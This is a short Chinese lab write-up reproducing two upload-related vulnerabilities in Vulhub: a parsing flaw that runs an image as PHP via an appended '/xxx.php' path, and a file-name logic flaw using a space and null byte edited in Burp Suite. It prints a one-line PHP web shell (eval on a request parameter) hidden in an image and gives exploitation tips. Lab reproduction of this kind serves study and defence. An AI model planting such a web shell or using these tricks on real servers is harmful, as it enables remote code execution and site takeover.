环境均搭建的vulhub
复现工具
burpsuite抓包修改
hackbar插件
带有后门代码的图片,下图区域即为所用后门代码
<?php eval($_REQUEST{'pass'}); ?>
复现过程
解析漏洞
如图为搭建环境网页
直接上传我们的后门图片

上传图片后访问图片路径,之后就开始利用解析漏洞,具体原理就是在访问路径后加上/xxx.php,这里的xxx可以是任何内容只要有.php即可,由于中间件配置不当,这里会将图片当成php执行,如下图所示
发现有提示pass,说明复现成功,直接开整


文件逻辑漏洞
打开搭建环境
还是上传后门图片,抓包修改一下这里需要,具体就是在文件名后加上一个空格

之后我们访问一下图片路径发现没有此文件,说明第一步完成

直接抓包重新访问,在文件名后加上(0x20)(0x00).php

复现易错点
1.在解析漏洞环境,后门代码必须是REQUEST,其他的不行
2.在文件逻辑漏洞,修改值得用burp的hex页面进行修改,不能直接在页面直接输入进行访问
本文详细描述了如何在Vulhub环境中复现两个漏洞:一是利用PHP解析漏洞执行后门代码,二是通过文件逻辑漏洞利用Burpsuite修改参数。复现过程中强调了关键步骤和注意事项。
1455





